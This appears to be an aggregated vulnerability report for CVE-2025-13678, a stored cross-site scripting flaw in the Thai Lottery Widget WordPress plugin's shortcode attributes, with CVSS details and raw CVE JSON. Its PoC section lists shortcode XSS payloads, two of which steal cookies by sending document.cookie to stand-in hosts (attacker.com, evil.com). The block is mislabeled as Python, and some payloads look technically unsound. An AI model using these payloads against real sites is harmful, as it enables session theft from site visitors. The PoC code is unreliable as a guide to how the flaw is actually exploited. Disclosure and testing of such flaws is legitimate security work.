Security Vulnerability Report
中文
CVE-2025-13678 CVSS 6.4 MEDIUM

CVE-2025-13678

Published: 2025-12-05 10:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Thai Lottery Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `thailottery` shortcode in all versions up to, and including, 2.5. This is due to insufficient input sanitization and output escaping on the user supplied `width` and `height` shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Thai Lottery Widget plugin for WordPress <= 2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13678 PoC - Thai Lottery Widget Stored XSS // Author: Security Researcher // Target: WordPress with Thai Lottery Widget plugin <= 2.5 // PoC 1: Basic XSS via width parameter [thailottery width='100" onmouseover="alert(document.cookie)" x="' height='200'] // PoC 2: XSS via height parameter [thailottery width='300' height='200" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)" x="'] // PoC 3: Combined XSS with event handler [thailottery width='500px;expression(alert("XSS"))' height='300'] // PoC 4: Using JavaScript URI scheme [thailottery width='javascript:alert(document.domain)' height='100'] // PoC 5: Cookie stealing payload [thailottery width='100' height='200' onload='fetch("https://evil.com/log?c="+btoa(document.cookie))'] // Exploitation scenario: // 1. Attacker with Contributor role creates/edits a post // 2. Inserts malicious shortcode with XSS payload // 3. Publishes or saves the post // 4. Any user visiting the page will execute the injected JavaScript

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13678", "sourceIdentifier": "[email protected]", "published": "2025-12-05T10:15:47.047", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Thai Lottery Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `thailottery` shortcode in all versions up to, and including, 2.5. This is due to insufficient input sanitization and output escaping on the user supplied `width` and `height` shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/thai-lottery-widget/tags/2.5/thailottery.php#L330", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/thai-lottery-widget/trunk/thailottery.php#L330", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/949eb9d6-0c8f-43f1-8580-998ea78c9549?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.